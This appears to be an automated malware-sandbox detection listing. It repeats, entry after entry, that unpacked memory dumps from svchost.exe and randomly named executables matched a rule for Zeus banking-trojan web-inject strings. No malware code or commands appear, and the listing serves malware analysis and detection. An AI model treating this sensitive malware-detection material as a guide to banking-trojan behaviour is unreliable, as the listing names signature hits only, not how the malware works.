Source: 13.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2d02000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.56.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.43.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.75.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.67.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.85.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.82.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.67.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2ab0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.76.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.ee0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.4900000.48.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.83.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1510000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.uavINoSIQh.exe.59cb00.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.42.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.uavINoSIQh.exe.597700.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.61.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 17.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.22c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.82.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2550000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.66.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.62.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.61.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.52.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.77.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.65.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.64.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.34.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.77.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 17.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.59.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2452000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.63.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.uavINoSIQh.exe.406400.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.889400.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.53.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.80.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1320000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 13.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2d60000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.13e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.75.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1342000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.65.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.uavINoSIQh.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.33.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.88a000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2702000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.14b2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.88a000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.14b2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.43c0000.51.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.69.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.69.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.57.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.76.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.27f2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2ab0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.34.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.72.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.622000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.56.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2aa0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.36.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.uavINoSIQh.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.622000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.73.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2c72000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.11c2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.64.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.74.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.889400.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.24b2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.e040000.40.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.28d2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.53.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2090000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.55.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.80.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.24a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2702000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2c72000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.884000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.36.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.66.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 17.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2262000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.24a6c00.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 13.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2d02000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.26a3c00.6.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2452000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.84.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.e440000.47.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.62.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.71.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.68.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.63.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2ad0000.2.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.37.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2ad0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.4900000.48.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.24a0000.2.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.uavINoSIQh.exe.407000.2.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.a52000.1.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.83.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1510000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.33.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.58.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.24a6c00.4.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2500000.6.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.e2c0000.39.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.43c0000.51.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.60.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.81.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.78.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2640000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2090000.2.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.uavINoSIQh.exe.406400.0.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.72.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.57.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.407000.1.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.e82000.1.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.884000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.43.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.74.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.uavINoSIQh.exe.407000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.42.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2640000.5.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.3060000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.uavINoSIQh.exe.59d700.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1320000.2.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.70.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.85.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2500000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.60.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.71.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.e82000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2aa0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.78.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.28d2000.1.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 13.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2d60000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.59.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.54.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.70.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.84.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.52.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.a52000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.24b2000.1.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.54.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.58.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.e040000.40.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.79.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1342000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.68.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
